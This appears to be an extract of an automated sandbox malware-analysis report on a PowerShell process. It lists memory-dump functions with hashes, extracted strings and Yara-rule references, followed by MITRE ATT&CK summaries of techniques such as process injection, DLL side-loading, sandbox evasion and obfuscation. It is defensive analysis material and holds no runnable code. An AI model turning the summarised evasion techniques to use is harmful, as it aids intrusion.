Opcode ID: ff1477944bda96d04ace7101615016fb821a294284b3658c981684477da0fbf3
Instruction ID: 0557fc44c953faed437a7530a62809ed0bd9ff293ea3479c151b9275136bffbf
Opcode Fuzzy Hash: ff1477944bda96d04ace7101615016fb821a294284b3658c981684477da0fbf3
Instruction Fuzzy Hash: 47016D35704A608F87166B38A41846D3BA7EFC963231E41DEE903C7396CE789C068F52

Function 0312F520 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4490014066.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e51f78b1774fb2f5ba19238f44c64b366353aa2756deb2c8ed4300f0ba0c12c4
Instruction ID: 2994e428583e0a366cf6dd661716c645d2da2cde4fdaeab3e911f542ef104d86
Opcode Fuzzy Hash: e51f78b1774fb2f5ba19238f44c64b366353aa2756deb2c8ed4300f0ba0c12c4
Instruction Fuzzy Hash: C9F0F935310921CF87596B28E41846E7BABEFC862231A559EE907C7355CE749C028B96

Function 00F1D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4489775108.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2d5db45faacf2ee0e2971ab047dae7638e349b6e24f5707e7b27ba8b6347b68
Instruction ID: a0aa03edecc799a582edd6349b6719e4bab5f3f8262f30ee560ee445e3861790
Opcode Fuzzy Hash: e2d5db45faacf2ee0e2971ab047dae7638e349b6e24f5707e7b27ba8b6347b68
Instruction Fuzzy Hash: 00F06271805344AEE7108A1AC9C4BA3FFA8EF56734F18C55AED484A286C2799885DAB1

Function 074D4D3C Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e74ae6b7e4fffdb606b281d026fcb5dba13292831264edd8cd9d2093e771cd7
Instruction ID: b409e590f8c02d08e392b027f02694fc844179c79c013fa800ee3829efca1db6
Opcode Fuzzy Hash: 3e74ae6b7e4fffdb606b281d026fcb5dba13292831264edd8cd9d2093e771cd7
Instruction Fuzzy Hash: D9F0377010A2C59FD3528B68D8B09A0BF71AF43210B1EC1DBD895CF6A3C3359D96CB62

Function 0312FDCA Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4490014066.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03f8c19677a5c5390e01a6e9bbc749ad7f58ba6323e2e1cd8aa8ae4d654f5386
Instruction ID: 4bb97a66bf16f09b6b65ed2907f09e075a9e9dfb5876e9cc42efcbb536e81b00
Opcode Fuzzy Hash: 03f8c19677a5c5390e01a6e9bbc749ad7f58ba6323e2e1cd8aa8ae4d654f5386
Instruction Fuzzy Hash: 39E0ED74D042499FC741DFB988815ADBFF4EF49210B1484AEC959D7202E63199528B95

Function 0312FDD8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4490014066.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 482d1d51b07206014fc5c294380a90f4bc2bfc9fffd1bb91ba837c71f0a9ba7e
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 1AD067B0D042199F8784EFADC94156EFFF4EB59200F6085AE8919E7301E7329A628BD1

Non-executed Functions

Function 00F1D4F0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4489775108.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d9977841b42da083f26774cad50dd6540f54b18b7d6136264878a1a5fc6eb63
Instruction ID: a4182ca0c6cd2c4d83e15776a21de53b08e063d1437e4f5668bfaf5d3c6bda3c
Opcode Fuzzy Hash: 2d9977841b42da083f26774cad50dd6540f54b18b7d6136264878a1a5fc6eb63
Instruction Fuzzy Hash: A8212872504204DFDB05DF14D9C0F66BF76FB98328F288569D9090B256C33AD895EBA2

Function 074D16D0 Relevance: 14.2, Strings: 11, Instructions: 497COMMON

Download Yara Rule

Strings

$jq, xrefs: 074D1708
4'jq, xrefs: 074D1937
4'jq, xrefs: 074D1941
tPjq, xrefs: 074D1759
$jq, xrefs: 074D1714
sl, xrefs: 074D1C60
tPjq, xrefs: 074D174D
sl, xrefs: 074D1C6E
sl, xrefs: 074D17B7
sl, xrefs: 074D17C5
$jq, xrefs: 074D16E2

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$sl$sl$sl$sl
API String ID: 0-1121019322
Opcode ID: 81c568281a362a70a4fc88395e8e7f78e9abd05e7a8c8bfbedcf98c5cfe890ea
Instruction ID: eb818ca5a1a086e7d0c16f196ca553e8e679045e2ecf42be9d5810745a527ded
Opcode Fuzzy Hash: 81c568281a362a70a4fc88395e8e7f78e9abd05e7a8c8bfbedcf98c5cfe890ea
Instruction Fuzzy Hash: 10F136B27042198FCB148A6895206EBBBE6EFC6320F15846BDC85CB361DB31DD46C7A1

Function 074DE8B0 Relevance: 14.0, Strings: 11, Instructions: 234COMMON

Download Yara Rule

Strings

84{l, xrefs: 074DEA57
d%pq, xrefs: 074DEB12
tPjq, xrefs: 074DEAB5
d%pq, xrefs: 074DEADD
tPjq, xrefs: 074DEAA9
d%pq, xrefs: 074DEA6F
84{l, xrefs: 074DEA61
4'jq, xrefs: 074DEB47
$jq, xrefs: 074DE990
4'jq, xrefs: 074DEB53
d%pq, xrefs: 074DEAD3

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$84{l$84{l$d%pq$d%pq$d%pq$d%pq$tPjq$tPjq$$jq
API String ID: 0-3162660120
Opcode ID: ad63cb2054a83a0cff05f95248754a3f3635fd3adc33d9256b16fc258abb2767
Instruction ID: 03ffc770cce256bcf852587250af35dd504aca6b631d38ff764e1593f24e94b3
Opcode Fuzzy Hash: ad63cb2054a83a0cff05f95248754a3f3635fd3adc33d9256b16fc258abb2767
Instruction Fuzzy Hash: 7181D3B17042269FCB248E24C560AFBBBE6EF85610F1485AAD8469F390CB35DD41C7A1

Function 074DA610 Relevance: 12.9, Strings: 10, Instructions: 437COMMON

Download Yara Rule

Strings

4'jq, xrefs: 074DA745
,S}l, xrefs: 074DA724
4'jq, xrefs: 074DAA7B
xS}l, xrefs: 074DA666
,S}l, xrefs: 074DA730
4'jq, xrefs: 074DAA87
4'jq, xrefs: 074DA8E8
4'jq, xrefs: 074DA8DE
d5mk, xrefs: 074DA716
4'jq, xrefs: 074DA74F

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: ,S}l$,S}l$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$d5mk$xS}l
API String ID: 0-2427533197
Opcode ID: 68212a491fae790f776ca489b5e52a4319912d5b9f2e291b7e98f00b2447ebde
Instruction ID: aa2fb7e03f2b5c0def1ac248de5f70709d53f6c6d497dd5015ba3868c4956e0c
Opcode Fuzzy Hash: 68212a491fae790f776ca489b5e52a4319912d5b9f2e291b7e98f00b2447ebde
Instruction Fuzzy Hash: 36E137B1B04206CFCB148B6895206EBBBB6EFC6210F19C5ABD985CB351DB35CD46C7A1

Function 074D0918 Relevance: 12.8, Strings: 10, Instructions: 322COMMON

Download Yara Rule

Strings

#mk, xrefs: 074D09E7
tPjq, xrefs: 074D0B65
4'jq, xrefs: 074D0A27
tPjq, xrefs: 074D0B71
$jq, xrefs: 074D0B20
sl, xrefs: 074D0BCF
$jq, xrefs: 074D0AFA
4'jq, xrefs: 074D0A1B
sl, xrefs: 074D0BDD
$jq, xrefs: 074D0B2C

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$tPjq$tPjq$#mk$$jq$$jq$$jq$sl$sl
API String ID: 0-1480755121
Opcode ID: 42e5de7ac08627a5a70ab75555841ecab8402313048bccd3b6936e9d084fdcaf
Instruction ID: 7aae7834598d49fad331987cf13b1980532a7148d024dbe336c146ae5fa79f88
Opcode Fuzzy Hash: 42e5de7ac08627a5a70ab75555841ecab8402313048bccd3b6936e9d084fdcaf
Instruction Fuzzy Hash: A0A128B27083558FC7158A7994206FBBBA6EFC2611F18846BD485CB3B1DB31CD45C7A1

Function 074D9788 Relevance: 9.0, Strings: 7, Instructions: 261COMMON

Download Yara Rule

Strings

xS}l, xrefs: 074D979C
tPjq, xrefs: 074D982C
,S}l, xrefs: 074D9965
p5mk, xrefs: 074D9957
xS}l, xrefs: 074D9933
,S}l, xrefs: 074D9971
tPjq, xrefs: 074D9838

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: ,S}l$,S}l$p5mk$tPjq$tPjq$xS}l$xS}l
API String ID: 0-538214970
Opcode ID: 5f20dbb08b8deed011de119e9ac27428558ce4c6233bfa2da2fd6c69811ee868
Instruction ID: 19ad6cb96c428503da3c102463534d70356943cc46389fa98ecb4b69e89c1ec2
Opcode Fuzzy Hash: 5f20dbb08b8deed011de119e9ac27428558ce4c6233bfa2da2fd6c69811ee868
Instruction Fuzzy Hash: 338149F1B043459FC7218B6899217EBBBE6DF82710F1485ABD589DB391DA31EC41C3A2

Function 074DC216 Relevance: 7.9, Strings: 6, Instructions: 403COMMON

Download Yara Rule

Strings

4'jq, xrefs: 074DC5EB
4'jq, xrefs: 074DC679
4'jq, xrefs: 074DC5D5
x.nk, xrefs: 074DC855
-nk, xrefs: 074DC88C
4'jq, xrefs: 074DC68F

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$x.nk$-nk
API String ID: 0-2690189290
Opcode ID: 3f62048f384560cf06dbcda03d9e9b698d993fdcc517c0d942a0d95cdc19cf67
Instruction ID: b585eca0b33ab85eb9329431f9729bd720c0b9add92a220f981c16d43a9c9ce1
Opcode Fuzzy Hash: 3f62048f384560cf06dbcda03d9e9b698d993fdcc517c0d942a0d95cdc19cf67
Instruction Fuzzy Hash: D6123DB0A002199FC714DF58C991BEABBB2FF89304F1185D5D509AB351CB72AE81CFA1

Function 074DB388 Relevance: 7.6, Strings: 6, Instructions: 105COMMON

Download Yara Rule

Strings

$jq, xrefs: 074DB403
$jq, xrefs: 074DB3DB
$jq, xrefs: 074DB42B
$jq, xrefs: 074DB41F
$jq, xrefs: 074DB40F
$jq, xrefs: 074DB3BF

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: $jq$$jq$$jq$$jq$$jq$$jq
API String ID: 0-3356825164
Opcode ID: ad34db0a90a60d48ca98557ac86a27ce363ad7752b125908943749253991688e
Instruction ID: 033ed91e4a85d14f0de328dfb4bc239fbd33dc7d62a8ac3a6f6daf650caad258
Opcode Fuzzy Hash: ad34db0a90a60d48ca98557ac86a27ce363ad7752b125908943749253991688e
Instruction Fuzzy Hash: F13143F27843128FDB258A65D8741E7B7A6EF82211B2A847FC8C28B381CE35CC46C351

Function 074DE9F6 Relevance: 7.6, Strings: 6, Instructions: 85COMMON

Download Yara Rule

Strings

84{l, xrefs: 074DEA57
d%pq, xrefs: 074DEADD
tPjq, xrefs: 074DEAA9
d%pq, xrefs: 074DEA6F
4'jq, xrefs: 074DEB47
d%pq, xrefs: 074DEAD3

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$84{l$d%pq$d%pq$d%pq$tPjq
API String ID: 0-2607162353
Opcode ID: c9257ca7c7100b6d2cd1220bbbec42e44e22ef9d98470085fc31977738164dc1
Instruction ID: d61171242e4b94a796f00c4caec68551f1a01217c0ecbdcdd4b40c1824df6f25
Opcode Fuzzy Hash: c9257ca7c7100b6d2cd1220bbbec42e44e22ef9d98470085fc31977738164dc1
Instruction Fuzzy Hash: 5A31C0B1B40225DFCB24CF14C554AAABBE6FB88710F25859AE845AF350C772ED01CBA0

Function 074DF589 Relevance: 6.4, Strings: 5, Instructions: 186COMMON

Download Yara Rule

Strings

tPjq, xrefs: 074DF666
tPjq, xrefs: 074DF65A
84{l, xrefs: 074DF607
$jq, xrefs: 074DF5D5
84{l, xrefs: 074DF611

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 84{l$84{l$tPjq$tPjq$$jq
API String ID: 0-3573240960
Opcode ID: a92f663368271c8bc2eb159ad68ac8cda0142532e6f61620f4d97a8217917315
Instruction ID: a20f2768c6677bbd5396db639f528278159b3fcdc9af133988afe7060a169c35
Opcode Fuzzy Hash: a92f663368271c8bc2eb159ad68ac8cda0142532e6f61620f4d97a8217917315
Instruction Fuzzy Hash: 50515A717002058FCB248F68D560AEAB7E7EF84310F14C46BE8529B755CB31DD46CB60

Function 074D0538 Relevance: 6.4, Strings: 5, Instructions: 150COMMON

Download Yara Rule

Strings

4'jq, xrefs: 074D0632
$jq, xrefs: 074D05C4
4'jq, xrefs: 074D0626
$jq, xrefs: 074D0609
$jq, xrefs: 074D05FD

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq$$jq
API String ID: 0-103809679
Opcode ID: 12b34631ab2ae9426b96fd743f22306c3d5036a94bc737da95fcce1cd37dcbb1
Instruction ID: a39ee4c3c4e36868651e13303d2d8819663f2e7296d5cc5c8a4a32acdf8e947a
Opcode Fuzzy Hash: 12b34631ab2ae9426b96fd743f22306c3d5036a94bc737da95fcce1cd37dcbb1
Instruction Fuzzy Hash: E14124B07043569FCB159A6499306FF7BA2DFC2211F14846BD981CB2A1DB36CD46C7A2

Function 074DEC5C Relevance: 6.4, Strings: 5, Instructions: 105COMMON

Download Yara Rule

Strings

4'jq, xrefs: 074DED15
$jq, xrefs: 074DECDD
4'jq, xrefs: 074DED09
$jq, xrefs: 074DECE9
$jq, xrefs: 074DECA3

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq$$jq
API String ID: 0-103809679
Opcode ID: 9c508399ea6c86b446edc38ad9563ac5e5ac982636da992bd4c3d15fb24f7e90
Instruction ID: 8f6a2436137f117ab7d116d82a5258c354df34e353491777e6bef06af14f3d27
Opcode Fuzzy Hash: 9c508399ea6c86b446edc38ad9563ac5e5ac982636da992bd4c3d15fb24f7e90
Instruction Fuzzy Hash: 3031E4B6744237CECB344A6998706F7B7A6AFC5611B28447BC9968E384DF36CC42C361

Function 074D0308 Relevance: 6.3, Strings: 5, Instructions: 65COMMON

Download Yara Rule

Strings

4'jq, xrefs: 074D0373
$jq, xrefs: 074D0352
$jq, xrefs: 074D035E
4'jq, xrefs: 074D037F
4'jq, xrefs: 074D02EB

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$$jq$$jq
API String ID: 0-2228512047
Opcode ID: b00aaeb18bafeb532e448556d574594b5d6a20fcfaa85abff45bdb6166e2eef9
Instruction ID: b302977787363d97e51386ba6159b7fc88c159e9b733219f6cc4cfe9d78ccb93
Opcode Fuzzy Hash: b00aaeb18bafeb532e448556d574594b5d6a20fcfaa85abff45bdb6166e2eef9
Instruction Fuzzy Hash: 6F11E5A134E3D64FC72A162829302E6AF769FC3550B2901EBC481DB3A6CA544D4A83B7

Function 074D9B80 Relevance: 5.3, Strings: 4, Instructions: 313COMMON

Download Yara Rule

Strings

4'jq, xrefs: 074D9D75
4'jq, xrefs: 074D9D81
4'jq, xrefs: 074D9C1A
4'jq, xrefs: 074D9C10

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq
API String ID: 0-4000621977
Opcode ID: 4f0c3261b09d20a0bc0903d7da3ec901cd2013b3d49cb7935cfe11e5ef442bbb
Instruction ID: 9eea097fa45461c1b103dfefcd621e10c4caa12f6b13ef6a6b6cf70255bc86db
Opcode Fuzzy Hash: 4f0c3261b09d20a0bc0903d7da3ec901cd2013b3d49cb7935cfe11e5ef442bbb
Instruction Fuzzy Hash: 60A1F3B27042568FCB158F6995242E7BBE6EFC6211F14847BC886CB351DB31ED42C7A1

Function 074D5F18 Relevance: 5.3, Strings: 4, Instructions: 281COMMON

Download Yara Rule

Strings

tPjq, xrefs: 074D604A
84{l, xrefs: 074D5FF3
tPjq, xrefs: 074D6056
84{l, xrefs: 074D5FFD

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 84{l$84{l$tPjq$tPjq
API String ID: 0-3595097213
Opcode ID: dec1e54043bd201af2bde8e283ba4e3f202cb6b74770e0a1d5379bd5e77d8d40
Instruction ID: ce3a382e20781c2fa65bf382aab4db04bea3b79923c934d6db3dc96a3daadc41
Opcode Fuzzy Hash: dec1e54043bd201af2bde8e283ba4e3f202cb6b74770e0a1d5379bd5e77d8d40
Instruction Fuzzy Hash: 9E9168B1700206DFCB149E6889606FBBBA6AF85350F19C86FD985CB391CE31DC41C7A2

Function 074D8500 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

(f}l, xrefs: 074D8601
(f}l, xrefs: 074D85F7
(f}l, xrefs: 074D8675
(f}l, xrefs: 074D867F

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: (f}l$(f}l$(f}l$(f}l
API String ID: 0-516988632
Opcode ID: c62589f7509a0202b09d1f08c8128b59084dc33f0c56a97afc677073a2a2a049
Instruction ID: 26f2f36e71cb3d56d53d52540707a5fd7cab54b3fde9b282dda2cb10a93d5fa6
Opcode Fuzzy Hash: c62589f7509a0202b09d1f08c8128b59084dc33f0c56a97afc677073a2a2a049
Instruction Fuzzy Hash: 8C7181B0A00105DFDB14CF98CA60AFEBBBAEF89314F15856AD845AB355DB31EC41CB91

Function 074DA5F4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

4'jq, xrefs: 074DA745
,S}l, xrefs: 074DA724
xS}l, xrefs: 074DA666
d5mk, xrefs: 074DA716

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: ,S}l$4'jq$d5mk$xS}l
API String ID: 0-560004796
Opcode ID: 0c42614327c259a7da095661240eaa277dd79c9c4cee43d7f7c1bda60cdf3a2b
Instruction ID: 729c051ad6b49145f044f99e937322c7f780364255542a97f830ff67b69dae6a
Opcode Fuzzy Hash: 0c42614327c259a7da095661240eaa277dd79c9c4cee43d7f7c1bda60cdf3a2b
Instruction Fuzzy Hash: 5331E2F5B00202DFCB208F688561AE77BB2EB95610F05C4A7D9849F351D735DD82CBA1

Function 074D36A0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$jq, xrefs: 074D36FC
$jq, xrefs: 074D36CE
$jq, xrefs: 074D36B2
$jq, xrefs: 074D3708

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: $jq$$jq$$jq$$jq
API String ID: 0-2428501249
Opcode ID: 145b2ac0645428e1239054dddb87717872df1c96f1467eb67aab0652733c00a4
Instruction ID: 6e5a3157149a6d179de49adfbb9a7a360f0d1d4ca3e3600f0e732009b9500dd5
Opcode Fuzzy Hash: 145b2ac0645428e1239054dddb87717872df1c96f1467eb67aab0652733c00a4
Instruction Fuzzy Hash: 332137F1310206DBDA345D6A98607E3BADA9BC2711F24C42B994587395DD75DC018372

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

